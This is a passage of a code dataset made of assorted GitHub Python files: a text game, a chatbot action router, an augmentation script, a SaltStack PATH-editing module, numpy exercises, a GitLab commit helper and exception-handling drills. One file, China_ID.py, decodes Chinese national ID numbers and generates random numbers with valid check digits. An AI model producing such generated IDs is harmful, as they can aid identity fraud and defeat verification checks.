\")\n\n    if name == '': # Check for an empty name\n        p1 = User()\n    else:\n        p1 = User(name)\n\n    print(\"\\r\\nThe game begins! Your character name is: {0}\\r\\n\".format(p1.name))\n    print(\"The map you are on will look like this:\")\n    map1 = GameMap([4, 5])\n    map1.pri_Map(p1._wei_zhi)\n    print(\"Reach the bottom-right corner and you win!\\r\\n\")\n    print(\"You can type adsw to move your character\")\n\n    # Random coordinates where monsters spawn\n    guai_wu_list = random.sample(map1.map, random.choice(range(0, GameMap.map_size[0] * GameMap.map_size[1])))\n\n    def gong_ji(fa_dong, bei_dong, shang_hai):\n        print(\" |{0}| attacked, dealing |{2}| damage to |{1}|!\".format(fa_dong, bei_dong, shang_hai))\n        p1._xue_liang -= fa_dong.gong_ji - bei_dong._fang_yu / 2\n\n        print(\" |{0}| remaining HP: |{1}| \".format(bei_dong, bei_dong._xue_liang))\n\n    while True:\n        keyworld = input(\"Move: \")\n        p1.move_User(keyworld)\n        map1.pri_Map(p1._wei_zhi)\n\n\n        if p1._wei_zhi != [0, 0]:\n            if p1._wei_zhi in guai_wu_list:\n                print(\"## Encountered {0}! Prepare for battle!\".format(slm.name))\n                while True:\n                    a = input(\"Attack: enter |1| to use a basic attack: \")\n\n                    if a == '1':\n                        gong_ji(p1.name, slm, p1._gong_ji_li)\n\n\n\n\n            if p1._wei_zhi == [GameMap.map_size[0]-1, GameMap.map_size[1]-1]:\n                print(\"~~~~~~You win!!~~~~~\")\n                break","repo_name":"Maroonlk/untitled2","sub_path":"游戏/英雄无敌/game_main.py","file_name":"game_main.py","file_ext":"py","file_size_in_byte":3859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"32620270133","text":"import requests\nfrom lxml import etree\nimport time\nimport json\nimport random\nimport datetime\n\njs = json.loads(open('./china_id.json','r').read())\n\ndef get(l):\n    \"\"\"\n    Fetch area codes that are missing from the database. *Disclaimer: for study and reference only; illegal use is prohibited\n    \"\"\"\n    try:\n        html = requests.get('http://www.stl56.com/idcard/'+str(l)+'.html').text\n    except Exception as e:\n        print(e)\n        return ''\n    else:\n        html = etree.HTML(html)\n        xpath = html.xpath('/html/body/div[2]/div[1]/div[2]/div[2]/h2')\n        if len(xpath) != 0:\n            return xpath[0].text\n        else:\n            return ''\n\ndef id_chenk_X(s_id: str) -> str:\n    \"\"\"\n    Compute the ID-card check digit. *Disclaimer: for study and reference only; illegal use is prohibited\n    \"\"\"\n    if len(s_id) == 18:\n        s = s_id[:17]\n    elif len(s_id) == 17:\n        s = s_id\n    else:\n        return False\n    x = ['1','0','X','9','8','7','6','5','4','3','2']\n    val = 0\n    for i in range(17,0,-1):\n        # print(s[17 - i])\n        val += (pow(2,i) % 11) * int(s[17 - i])\n    return x[val % 11]\n\ndef chenk_id(s_id: str) -> bool:\n    \"\"\"\n    Check whether an ID number is valid. *Disclaimer: for study and reference only; illegal use is prohibited\n    \"\"\"\n    if len(s_id) != 18:\n        return False\n    return id_chenk_X(s_id) == s_id[17]\n\ndef id_analysis(s_id: str) -> dict:\n    \"\"\"\n    Extract the information encoded in an ID number. *Disclaimer: for study and reference only; illegal use is prohibited\n    \"\"\"\n    if not chenk_id(s_id):\n        return False\n    s = js.get(s_id[0:2] + '0000','')\n    shi = js.get(s_id[0:4] + '00','')\n    qu = js.get(s_id[0:6],'')\n    if s == '':\n        region = get(s_id[0:6])\n    elif shi == '':\n        region = get(s_id[0:6])\n    elif qu == '':\n        region = get(s_id[0:6])\n    else:\n        region = s + shi + qu\n    if (int(s_id[16]) % 2) == 1:\n        gender = 'boy'\n    else:\n        gender = 'girl'\n    return {'status':region != '','id':s_id,'region':region,'gender':gender,'birthday':s_id[6:14]}\n\ndef rand_id(year: int) -> str:\n    \"\"\"\n    Generate a random ID number for the given age. *Disclaimer: for study and reference only; illegal use is prohibited\n    \"\"\"\n    rand = random.randint(0,len(js))\n    n = 0\n    for i in js:\n        if n == rand:\n            rand = str(random.randint(100,999))\n            stime = str(datetime.datetime.now().year - year) + str(datetime.datetime.now().month) + str(datetime.datetime.now().day)\n            return i + stime + rand + id_chenk_X(i + stime + rand)\n        n += 1\n\n# print(id_analysis(rand_id(18)))\n","repo_name":"577fkj/China-ID-Card","sub_path":"China_ID.py","file_name":"China_ID.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"19905363660","text":"from typing import Dict, Callable\r\n\r\nfrom TMTChatbot.Common.storage.base_storage import BaseStorage\r\nfrom TMTChatbot.Common.default_intents import *\r\nfrom TMTChatbot.Common.common_keys import *\r\nfrom TMTChatbot.AlgoClients.weather_service import WeatherService\r\nfrom TMTChatbot.Schema.common.billing_method import ShipMethod, PaymentMethod\r\nfrom TMTChatbot.ServiceWrapper.services.base_service import BaseServiceSingleton\r\nfrom TMTChatbot.StateController.services.information_extractor import BaseInformationExtractor\r\nfrom TMTChatbot.StateController.services.shop_manager import ShopManager\r\nfrom TMTChatbot.StateController.services.user_manager import UserManager\r\nfrom TMTChatbot.StateController.services.value_mapping import ValueMapping\r\nfrom 
TMTChatbot.StateController.services.bot_intent import BotIntent\r\nfrom TMTChatbot.StateController.services.billing_service import BillingManager\r\nfrom TMTChatbot.StateController.services.multiple_choice_manager import MultipleChoiceManager\r\nfrom TMTChatbot.StateController.services.qa_service import QAService\r\nfrom TMTChatbot.StateController.config.config import Config\r\nfrom TMTChatbot.StateController.services.product_search_manager import ProductSearchManager\r\nfrom TMTChatbot.StateController.services.recommendation_manager import RecommendationManager\r\nfrom TMTChatbot.StateController.services.size_consultant_manager import SizeConsultantManager\r\nfrom TMTChatbot.Schema.objects.conversation import Conversation\r\n\r\n\r\nclass ActionManager(BaseServiceSingleton):\r\n def __init__(self, storage: BaseStorage, config: Config):\r\n super(ActionManager, self).__init__(config=config)\r\n self.information_extractor = BaseInformationExtractor(config=config, storage=storage)\r\n self.bot_intent_extractor = BotIntent(config=config, storage=storage)\r\n self.value_mapper = ValueMapping(config=config, storage=storage)\r\n self.billing_manager = BillingManager(config=config, storage=storage)\r\n self.user_manager = UserManager(config=config, storage=storage)\r\n self.shop_manager = ShopManager(config=config, storage=storage)\r\n self.multiple_choice_manager = MultipleChoiceManager(config=config, storage=storage)\r\n self.product_search_manager = ProductSearchManager(config=config, storage=storage)\r\n self.recommendation_manager = RecommendationManager(config=config, storage=storage)\r\n self.size_consultant_manager = SizeConsultantManager(config=config, storage=storage)\r\n self.qa_services = QAService(config=config, storage=storage)\r\n self.weather_services = WeatherService(config=config, storage=storage)\r\n self.actions: Dict[str, Callable[[Conversation], ...]] = {\r\n BOT_CHECK_PRODUCT_HAS_DISCOUNT: self.billing_manager.check_product_discount,\r\n\r\n BOT_ADD_MULTIPLE_VALUE_CHOICE_CANDIDATES: self.multiple_choice_manager.add_multiple_value_choices,\r\n BOT_PROCESS_MULTIPLE_CHOICES: self.multiple_choice_manager.process_state,\r\n BOT_DROP_MULTIPLE_CHOICES: self.multiple_choice_manager.drop_multiple_choices,\r\n BOT_REFRESH_MULTIPLE_CHOICES: self.multiple_choice_manager.refresh_multiple_choices,\r\n BOT_ADD_OBJECT_RECOMMENDATIONS: self.recommendation_manager.add_product_recommendations,\r\n BOT_ADD_MULTIPLE_OBJECT_CHOICE_RECOMMENDATIONS: self.recommendation_manager.add_product_multiple_choices,\r\n BOT_UPDATE_USER_ATTRIBUTE_STATUS: self.user_manager.update_user_attribute_status(False),\r\n # BOT_CHECK_USER_MULTI_VALUE: self.user_manager.check_user_multi_value(False),\r\n BOT_CHECK_SHOP_MULTI_VALUE: self.shop_manager.check_shop_multi_value(False),\r\n\r\n BOT_CHECK_BILL_PRODUCT_UNIQUE: self.multiple_choice_manager.unique_bill_object(False),\r\n BOT_ADD_BILL_PRODUCT: self.billing_manager.add_billing_product,\r\n BOT_ADD_CARE_PRODUCT: self.billing_manager.add_care_product,\r\n BOT_ADD_PAYMENT_BANK_ACCOUNT_RECOMMENDATIONS: self.billing_manager.add_payment_bank_account_recommendations,\r\n BOT_ADD_BILL_PAYMENT_BANK_ACCOUNT: self.billing_manager.add_bill_payment_bank_account,\r\n BOT_CANCEL_PRODUCT: self.billing_manager.cancel_product,\r\n BOT_CONFIRM_BILL: self.billing_manager.confirm_bill,\r\n BOT_PROCESS_BILL: self.billing_manager.process_bill,\r\n BOT_CHECK_BILL_INFOR: self.billing_manager.check_bill_infor,\r\n BOT_UPDATE_BILL_ADDRESS: 
self.billing_manager.update_bill_info(BILL_ADDRESS),\r\n BOT_UPDATE_BILL_PHONE_NUMBER: self.billing_manager.update_bill_info(BILL_PHONE_NUMBER),\r\n BOT_UPDATE_PENDING_PAYMENT: self.billing_manager.update_pending_payment,\r\n BOT_CHECK_USER_SEND_PAYMENT: self.billing_manager.bill_image_service,\r\n\r\n BOT_ANSWER_PRODUCT_QUESTION: self.qa_services.answer_user_product_question,\r\n BOT_ANSWER_PRODUCT_QUESTION_WITH_INTENT: self.qa_services.answer_user_product_question_with_intent,\r\n\r\n BOT_PRODUCT_IMAGE_SEARCH_MODEL: self.product_search_manager.node_product_image_search,\r\n BOT_UPDATE_WEATHER_INFOR: self.weather_services.update_weather_infor,\r\n\r\n BOT_CHECK_BILL_PRODUCT_TO_CANCEL: self.billing_manager.check_bill_product_to_cancel,\r\n BOT_ADD_DROP_PRODUCT_CHOICES: self.multiple_choice_manager.add_drop_product_choices,\r\n\r\n BOT_ADD_PHONE_NUMBER_CHOICES: self.multiple_choice_manager.add_infor_multiple_choices(BILL_PHONE_NUMBER,\r\n CONV_USER),\r\n BOT_ADD_ADDRESS_CHOICES: self.multiple_choice_manager.add_infor_multiple_choices(BILL_ADDRESS, CONV_USER),\r\n BOT_UPDATE_USER_INFOR: self.user_manager.update_user_infor_multiple_choices,\r\n BOT_UPDATE_SHOP_INFOR_MULTIPLE_CHOICES: self.shop_manager.update_shop_infor_multiple_choices,\r\n\r\n BOT_REMOVE_BILL_RECEIVE_SHOWROOM: self.billing_manager.remove_bill_attribute(BILL_RECEIVE_SHOWROOM),\r\n BOT_REMOVE_BILL_PAYMENT_METHOD: self.billing_manager.remove_bill_attribute(BILL_PAYMENT_METHOD),\r\n BOT_UPDATE_BILL_RECEIVE_TIME: self.billing_manager.update_bill_info(BILL_RECEIVE_TIME),\r\n BOT_UPDATE_BILL_RECEIVE_SHOWROOM: self.billing_manager.update_bill_info(BILL_RECEIVE_SHOWROOM),\r\n BOT_ADD_SHOWROOM_CHOICES: self.multiple_choice_manager.add_infor_multiple_choices(SHOWROOM, CONV_SHOP),\r\n BOT_CHECK_USER_SIZE: self.size_consultant_manager.check_user_size(False),\r\n BOT_PREDICT_USER_SIZE: self.size_consultant_manager.predict_size,\r\n BOT_UPDATE_USER_SIZE: self.size_consultant_manager.update_user_size,\r\n BOT_UPDATE_BILL_PRODUCT_SIZE: self.billing_manager.update_bill_product_attr(PRODUCT_SIZE),\r\n BOT_CHECK_USER_SIZE_REMAIN: self.size_consultant_manager.check_user_size_remain,\r\n BOT_CHECK_MENTIONED_SIZE_IN_TABLE: self.size_consultant_manager.check_mentioned_size_in_table,\r\n\r\n BOT_UPDATE_BILL_PAYMENT: self.billing_manager.update_bill_info(BILL_PAYMENT),\r\n BOT_REMOVE_BILL_PAYMENT: self.billing_manager.remove_bill_attribute(BILL_PAYMENT),\r\n\r\n # NOTE: State - Check Order Status\r\n BOT_GET_CHOSEN_BILL: self.billing_manager.get_chosen_bill,\r\n BOT_ADD_BILLS_TO_CHECK_ORDER_STATUS: self.billing_manager.add_bills_to_check_order_status,\r\n BOT_CHECK_NUMBER_OF_PROCESSING_BILLS: self.billing_manager.check_number_of_processing_bills,\r\n BOT_DROP_BILLS_AFTER_CHECK_ORDER_STATUS: self.billing_manager.drop_bills_after_check_order_status,\r\n\r\n BOT_CHECK_USER_HISTORY_BILL: self.user_manager.check_user_history_bill,\r\n BOT_FORWARD_TO_ADMIN: self.shop_manager.forward_to_admin\r\n }\r\n self.add_update_bill_receive_method()\r\n self.add_update_bill_payment_method()\r\n\r\n def add_update_bill_receive_method(self):\r\n [self.add_action(action_name=f\"{BASE_BOT_UPDATE_BILL_RECEIVE_METHOD}_{ship_method}\",\r\n action_function=self.billing_manager.update_bill_infor_with_value(BILL_RECEIVE_METHOD,\r\n ship_method))\r\n for ship_method in ShipMethod.keys()]\r\n\r\n def add_update_bill_payment_method(self):\r\n [self.add_action(action_name=f\"{BASE_BOT_UPDATE_BILL_PAYMENT_METHOD}_{payment_method}\",\r\n 
action_function=self.billing_manager.update_bill_infor_with_value(BILL_PAYMENT_METHOD,\r\n payment_method))\r\n for payment_method in PaymentMethod.keys()]\r\n\r\n def add_action(self, action_name, action_function):\r\n if action_name in self.actions:\r\n raise ValueError(f\"{action_name} already exist. Please use different action_name\")\r\n self.actions[action_name] = action_function\r\n\r\n def map_bot_expectation(self, conversation: Conversation):\r\n self.information_extractor.map_bot_expectation(conversation)\r\n\r\n def default_global_actions(self, conversation: Conversation):\r\n pass\r\n\r\n def default_pre_actions(self, conversation: Conversation, is_new_action: bool = False,\r\n mapping_info_only: bool = False):\r\n \"\"\"\r\n Some task must be done in every conversation turn to extract basic information from users\r\n :param conversation:\r\n :param is_new_action:\r\n :param mapping_info_only:\r\n :return:\r\n \"\"\"\r\n if mapping_info_only:\r\n self.information_extractor.mapping_info(conversation)\r\n else:\r\n self.information_extractor.information_extraction(conversation, is_new_action)\r\n self.information_extractor.mapping_info(conversation, is_new_action)\r\n self.bot_intent_extractor.extract_state_based_intents(conversation)\r\n\r\n def make_pre_actions(self, conversation: Conversation, is_new_action: bool = False,\r\n mapping_info_only: bool = False):\r\n \"\"\"\r\n Looking for action in PRE ACTIONS to execute the appropriate function\r\n :param conversation:\r\n :param is_new_action:\r\n :param mapping_info_only:\r\n :return:\r\n \"\"\"\r\n self.default_pre_actions(conversation=conversation, is_new_action=is_new_action,\r\n mapping_info_only=mapping_info_only)\r\n current_action = conversation.current_action\r\n if current_action is not None:\r\n for pre_action in current_action.pre_actions.values():\r\n if pre_action.tag in self.actions:\r\n func = self.actions[pre_action.tag]\r\n func(conversation)\r\n else:\r\n self.logger.warning(f\"Func {pre_action.tag} not Implemented\")\r\n\r\n def make_post_actions(self, conversation: Conversation):\r\n \"\"\"\r\n Looking for action in POST ACTIONS to execute the appropriate function\r\n :param conversation:\r\n :return:\r\n \"\"\"\r\n current_action = conversation.current_action\r\n if current_action is not None:\r\n for post_action in current_action.post_actions.values():\r\n if post_action.tag in self.actions:\r\n func = self.actions[post_action.tag]\r\n func(conversation)\r\n else:\r\n self.logger.warning(f\"Func {post_action.tag} not Implemented\")\r\n\r\n def make_current_action(self, conversation: Conversation):\r\n \"\"\"\r\n Looking for action in CURRENT DONE BRANCH to execute the appropriate function\r\n :param conversation:\r\n :return:\r\n \"\"\"\r\n current_action = conversation.current_action\r\n if current_action is not None:\r\n current_branch = current_action.current_branch\r\n if current_branch is not None:\r\n self.logger.debug(f\"POST ACTIONS {current_action.name, current_branch.post_actions.values()}\")\r\n for current_action in current_branch.post_actions.values():\r\n if current_action.tag in self.actions:\r\n func = self.actions[current_action.tag]\r\n func(conversation)\r\n else:\r\n self.logger.warning(f\"Func {current_action.tag} not 
Implemented\")\r\n","repo_name":"ToDuyHung/API-Manager","sub_path":"Common/TMTChatbot/StateController/services/action_manager.py","file_name":"action_manager.py","file_ext":"py","file_size_in_byte":12489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"35975593209","text":"import albumentations as A\nimport cv2, glob, os\n\nfilelist = glob.glob(\"*\")\n\nnumber = 0 # 3은 transform1 변경 -> 끝나고 다시 변경\n\ntransform = A.Compose([\n A.Rotate(limit=[90*(number+1),90*(number+1)],rotate_method=\"largest_box\",border_mode=cv2.BORDER_CONSTANT,p=1)\n ], bbox_params = A.BboxParams(format=\"yolo\"))\n\ntransform1 = A.Compose([\n A.RandomBrightnessContrast(brightness_limit=(-0.2, 0.2), contrast_limit=(-0.2, 0.2), p=1),\n A.CLAHE(p=1),\n A.OpticalDistortion(p=0.5),\n A.RandomRotate90(p=0.5),\n A.GaussNoise(p=0.5, var_limit=(100, 200))\n ], bbox_params = A.BboxParams(format=\"yolo\"))\n\ntransform2 = A.Compose([\n A.PadIfNeeded(2000,2000,border_mode=cv2.BORDER_REPLICATE, p=1)\n\n ], bbox_params = A.BboxParams(format=\"yolo\"))\n\ndef savefig(file):\n boxes = []\n image = cv2.imread(file)\n\n filename, _ = os.path.splitext(file)\n\n with open(f'./cooTXT/{filename}.txt','r') as txt:\n for line in txt.readlines():\n cls,center_x,center_y,width,height = list(map(float,line.strip().split(\" \")))\n\n x_min = center_x - width/2; x_max = center_x + width/2\n y_min = center_y - height/2; y_max = center_y + height/2\n\n if x_min < 0:\n width = center_x*2\n \n elif x_max > 1:\n width = (1 - center_x)*2\n\n if y_min < 0:\n height = center_y*2\n\n elif y_max > 1:\n height = (1 - center_y)*2\n\n axis = [center_x,center_y,width,height,cls]\n boxes.append(axis)\n\n transformed = transform2(image=image,bboxes=boxes)\n transformed_image = transformed['image']\n transformed_bboxes = transformed['bboxes']\n\n cv2.imwrite(f\"./trash/{number}{file}\",transformed_image)\n\n f = open(f\"./trash/cooTXT/{number}{filename}.txt\",'w')\n\n for box in transformed_bboxes:\n f.write(f\"{int(box[-1])} {box[0]} {box[1]} {box[2]} {box[3]}\\n\")\n f.close()\n\nfor file in filelist:\n if os.path.isdir(file):\n continue\n\n savefig(file)","repo_name":"KongTi/CheckingCircle","sub_path":"augmentation.py","file_name":"augmentation.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"72930476959","text":"\"\"\"\nFunctions for VSCode-Anywhere\n\"\"\"\n\nimport salt.utils.platform\nimport salt.utils.files\nimport salt.exceptions\nimport os\nimport re\n\n\ndef __virtual__():\n \"\"\"\n Load the module\n \"\"\"\n return True\n\n\ndef get_id(sls):\n \"\"\"\n Generate an id based on the sls\n\n Args\n\n sls (str):\n sls Saltstack variable ({{ sls }})\n\n Returns\n\n list:\n Return the id for a state\n\n \"\"\"\n return sls.replace(\"/\", \":\").replace(\".\", \":\")\n\n\ndef relpath(source, dest):\n \"\"\"\n Return the relative path between two paths\n\n Args\n\n source (str):\n Start path\n\n dest (str):\n End path\n\n Returns\n\n str:\n Return the relative path from the source to the dest path\n \"\"\"\n relpath = os.path.relpath(dest, source)\n if str(relpath).startswith(\".\"):\n return relpath\n else:\n return os.path.join(\".\", str(relpath))\n\n\ndef abspath(path):\n \"\"\"\n Return the absolute path of a path\n\n Args\n\n path (str):\n path to convert\n\n Returns\n\n str:\n Return the absolute path from the source to the dest path\n \"\"\"\n return os.path.abspath(path)\n\n\ndef 
get_env():\n \"\"\"\n Read the VSCode-Anywhere environment file and return a dict\n\n Returns\n\n dict:\n Returns a dictionnary environment\n \"\"\"\n found = {}\n env_file = __salt__[\"grains.get\"](\"vscode-anywhere:tools:env\")\n\n if os.path.isfile(env_file):\n with salt.utils.files.fopen(env_file) as _f:\n for line in _f.readlines():\n comment = re.search(\"^\\\\s*#\", line)\n if not comment:\n if salt.utils.platform.is_windows():\n search = re.search(\"^\\\\$env:(.*?)=(.*)$\", line)\n else:\n search = re.search(\"^(.*?)=(.*)$\", line)\n\n if search and len(search.groups()) == 2:\n found[search.group(1)] = search.group(2).strip('\"').strip(\"'\")\n return found\n\n\ndef is_path_env(val):\n env_file = __salt__[\"grains.get\"](\"vscode-anywhere:tools:env\")\n\n if salt.utils.platform.is_windows():\n sep = \";\"\n regex = \"^\\\\s*\\\\$env\\\\:PATH\\\\=[\\\"\\\\']?([^\\\"\\\\']*?)[\\\"\\\\']?$\"\n else:\n sep = \":\"\n regex = \"^\\\\s*PATH\\\\=[\\\"\\\\']?([^\\\"\\\\']*?)[\\\"\\\\']?$\"\n\n if os.path.isfile(env_file):\n with salt.utils.files.fopen(env_file, mode=\"r+\") as _f:\n for line in _f.readlines():\n search = re.search(regex, line)\n\n if search:\n if len(search.groups()) == 1 and val in search.group(1).split(sep):\n return True\n else:\n return False\n return False\n else:\n raise salt.exceptions.SaltInvocationError(\n \"File {} does not exist\".format(env_file)\n )\n\n\ndef append_path_env(val):\n env_file = __salt__[\"grains.get\"](\"vscode-anywhere:tools:env\")\n path = []\n find = False\n\n if salt.utils.platform.is_windows():\n sep = \";\"\n regex = \"^\\\\s*\\\\$env\\\\:PATH\\\\=[\\\"\\\\']?([^\\\"\\\\']*?)[\\\"\\\\']?$\"\n else:\n sep = \":\"\n regex = \"^\\\\s*PATH\\\\=[\\\"\\\\']?([^\\\"\\\\']*?)[\\\"\\\\']?$\"\n\n if os.path.isfile(env_file):\n orig_file = open(env_file, mode=\"r\").readlines()\n with salt.utils.files.fopen(env_file, mode=\"w\") as _f:\n for line in orig_file:\n search = re.search(regex, line)\n for v in val.split(sep):\n if search:\n find = True\n if len(search.groups()) == 1 and v not in search.group(1).split(\n sep\n ):\n path.append(v)\n\n if path and search and len(search.groups()) == 1:\n s_path = \"{}\".format(sep).join(path)\n\n if salt.utils.platform.is_windows():\n _f.write(\n '$env:PATH=\"{}{}{}\"\\n'.format(s_path, sep, search.group(1))\n )\n else:\n _f.write('PATH=\"{}{}{}\"\\n'.format(s_path, sep, search.group(1)))\n else:\n _f.write(\"{}\".format(line))\n\n if find is False:\n if salt.utils.platform.is_windows():\n _f.write('$env:PATH=\"{}\"'.format(val))\n else:\n _f.write('PATH=\"{}\"'.format(val))\n\n new_file = open(env_file, mode=\"r\").readlines()\n differences = __utils__[\"stringutils.get_diff\"](orig_file, new_file)\n return differences\n else:\n raise salt.exceptions.SaltInvocationError(\n \"File {} does not exist\".format(env_file)\n )\n\n\ndef remove_path_env(val):\n env_file = __salt__[\"grains.get\"](\"vscode-anywhere:tools:env\")\n path = []\n\n if salt.utils.platform.is_windows():\n sep = \";\"\n regex = \"^\\\\s*\\\\$env\\\\:PATH\\\\=[\\\"\\\\']?([^\\\"\\\\']*?)[\\\"\\\\']?$\"\n else:\n sep = \":\"\n regex = \"^\\\\s*PATH\\\\=[\\\"\\\\']?([^\\\"\\\\']*?)[\\\"\\\\']?$\"\n\n if os.path.isfile(env_file):\n orig_file = open(env_file, mode=\"r\").readlines()\n with salt.utils.files.fopen(env_file, mode=\"w\") as _f:\n for line in orig_file:\n search = re.search(regex, line)\n if search:\n path = search.group(1).split(sep)\n for v in val.split(sep):\n if v in path:\n path.remove(v)\n\n if path and search and 
len(search.groups()) == 1:\n                    s_path = \"{}\".format(sep).join(path)\n\n                    if salt.utils.platform.is_windows():\n                        _f.write('$env:PATH=\"{}\"\\n'.format(s_path))\n                    else:\n                        _f.write('PATH=\"{}\"\\n'.format(s_path))\n                else:\n                    _f.write(\"{}\".format(line))\n\n        new_file = open(env_file, mode=\"r\").readlines()\n        differences = __utils__[\"stringutils.get_diff\"](orig_file, new_file)\n        return differences\n    else:\n        raise salt.exceptions.SaltInvocationError(\n            \"File {} does not exist\".format(env_file)\n        )\n\n\ndef cleanup():\n    if salt.utils.platform.is_windows():\n        raise salt.exceptions.SaltInvocationError(\"Not yet available on Windows\")\n    else:\n        nix = __salt__[\"nix.collect_garbage\"]()\n        brew = __salt__[\"cmd.run\"](\"/home/linuxbrew/.linuxbrew/bin/brew cleanup -s\")\n        if brew == \"\":\n            brew = \"Nothing to cleanup\"\n        return {\n            \"brew\": brew.splitlines(),\n            \"nix\": nix,\n        }\n        # return \"Nix:\\n{}\\n\\nBrew:\\n{}\".format(\"\\n\".join(nix), brew)\n","repo_name":"gigi206/VSCode-Anywhere","sub_path":"_modules/vscode_anywhere.py","file_name":"vscode_anywhere.py","file_ext":"py","file_size_in_byte":6760,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"51"} +{"seq_id":"38245248472","text":"import numpy as np\nimport argparse\n\nparser = argparse.ArgumentParser(description='Prints mean, median, std deviation, determinant and inverse')\nparser.add_argument('-p','--path', required=True, help='Relative path to the csv file')\nargs = parser.parse_args()\n\ncsv = np.genfromtxt(args.path,delimiter=',')\nmat = np.round(csv).astype(int)\nrows, cols = mat.shape\n#print(mat)\n\n#Operations2.py\nmean = np.mean(mat, axis=0)\nprint(mean)\nmedian = np.median(mat, axis=0)\nprint(median)\ndeviat = np.std(mat, axis=0)\ndeviat_2 = np.around(deviat, decimals=2)\nprint(deviat_2)\ndeterminant = np.linalg.det(mat)\nprint(determinant)\nif(determinant!=0):\n    inv = np.linalg.inv(mat)\n    inverse_2 = np.around(inv, decimals=2)\n    print(inverse_2)\nelse:\n    pseudo = np.linalg.pinv(mat)\n    pseudo_inv_2 = np.around(pseudo, decimals=2)\n    print(pseudo_inv_2)\n\n\n","repo_name":"UtkarshRjn/cs251-assignments","sub_path":"outlab3/200050002-200050147/numpy/q2_a/operations2.py","file_name":"operations2.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"48031008364","text":"from bottle import request\nfrom config import *\nfrom api.auth import Gitlab\nfrom tools import get_custom_logger\nfrom tools import retry_with_active\n\nclass GitApi:\n    def __init__(self, token, url):\n        self.git_auth_instance = Gitlab(token, url)\n        self.__logger = get_custom_logger('[ADC]', f'users',\"INFO\")\n        self.data = self.git_auth_instance.gitlab_connect()\n\n    def commit_files_branch(self, file_name):\n        \"\"\"\n        Add files to the GitLab server\n        \"\"\"\n        project = self.data.projects.get(BRANCH_ID)\n        if file_name == \"l2m-users.dev\":\n            commit_message = \"Update testing\"\n        elif file_name == \"l2m-users.prod\":\n            commit_message = \"Update prod\"\n        else:\n            raise ValueError(f\"Unsupported file name: {file_name}\")\n\n        value = {\n            'branch': BRANCH,\n            'commit_message': commit_message,\n            'actions': [\n                {\n                    'action': 'update',\n                    'file_path': f'{file_name}',\n                    'content': open(f'{FILES_DIR}/{file_name}').read(),\n                }\n            ]\n        }\n        self.__logger.log(20, f'Payload {value}')\n        commit = project.commits.create(value)\n        self.__logger.log(20, f'Commit {commit}')\n        if commit.stats.get('total') == 0:\n            return \"SKIPPED\"\n        else:\n            result = self.get_pipelines()\n            return result\n\n    @retry_with_active(retries=8, 
sleep=3)\n def get_pipelines(self):\n project = self.data.projects.get(BRANCH_ID)\n pipeline = project.pipelines.get('latest')\n return pipeline\n\n @staticmethod\n def git_api_request():\n \"\"\"\n Get cookies value\n \"\"\"\n api_url = request.get_cookie('api_url', secret=secret)\n nm_token = request.get_cookie('nm_token', secret=secret)\n git_api_request = GitApi(nm_token, api_url)\n return git_api_request\n\n\n\n\n\n\n\n","repo_name":"alex19451/adc","sub_path":"tools/gitlab_api.py","file_name":"gitlab_api.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"38237797129","text":"# a = 1\n# b = 0\n#\n# try:\n# result = a/b\n# print(result)\n# except:\n# print(\"Error!\")\nimport selenium.common\n# x = 9\n# y = 0\n#\n# try:\n# result = x / y\n# print(result)\n# except:\n# print(\"This is not allowed\")\n\n# a = 1\n# b = 0\n#\n# try:\n# result = a/b\n# print(result)\n# except ZeroDivisionError as zero_error:\n# print(zero_error)\n# print(\"Error! ZeroDivisionError\")\n\n# nominator = 100.21\n# denominator = \"a string\"\n# # denominator = 0\n# # denominator = 2\n#\n# try:\n# result = nominator/denominator\n# print(result)\n# except ZeroDivisionError as zero_error:\n# print(zero_error)\n# print(\"Error! ZeroDivisionError.\")\n# except TypeError as division_float_string:\n# print(division_float_string)\n# print(\"An exception TypeError occurred!\")\n# else:\n# print(result)\n# print(\"No errors!\")\n# finally:\n# print(\"I'm always here\")\n\n\n# def calculate_percent(value, total):\n# try:\n# percent = value * 100 / total\n# except TypeError as string_error:\n# # print(string_error)\n# print(\"Invalid values! {value} and {total} must be a valid number!\")\n# except ZeroDivisionError as zero_error:\n# # print(zero_error)\n# print(f\"Invalid values! {value} and {total} must be a valid number!\")\n# else:\n# # print(\"No errors!\")\n# print(percent)\n#\n#\n# calculate_percent(1, 2)\n# calculate_percent('1', 2)\n# calculate_percent('a', None)\n# calculate_percent(28, 0)\n# calculate_percent(50, 99)\n\n\n# try except in try except block construction\n# a = 0\n# b = 1\n#\n# try:\n# result = a/b\n# print(result)\n# except ZeroDivisionError as zero_error:\n# print(zero_error)\n# print(\"Error! ZeroDivisionError!\")\n# except TypeError as type_error:\n# print(type_error)\n# print(\"Error! 
TypeError!\")\n# else:\n# try:\n# result = b/a\n# print(result)\n# except:\n# print(\"No result\")\n# finally:\n# print(\"I'm always here\")\n\n\n# # Exercise try except with xpath list\n# from selenium import webdriver\n# from selenium.webdriver.chrome.service import Service\n# from selenium.webdriver.common.by import By\n#\n# driver = webdriver.Chrome(service=Service(r'C:\\TestFiles\\New_driver\\chromedriver.exe'))\n# driver.get('https://antoogle.testoneo.com')\n#\n# xpath_list = ['*yolo_this_is_not_xpath*', '//*[@class=\"this xpath cannot be found\"]',\n# '//*[@class=\"h6 mb-3 font-weight-normal\"]']\n#\n# for xpath in xpath_list:\n# try:\n# elem = driver.find_element(By.XPATH, xpath)\n# # print(elem.text)\n# except selenium.common.exceptions.InvalidSelectorException as invalid_selector_exceptions:\n# print(invalid_selector_exceptions)\n# print(f'XPath {xpath} is broken!')\n# except selenium.common.exceptions.NoSuchElementException as no_such_element_exception:\n# print(no_such_element_exception)\n# print(f'Element with {xpath} not found')\n# else:\n# print(f'XPath {xpath} is fine and element was found - good job!')\n#\n# driver.quit()\n\n\n# # Calculator project with raise 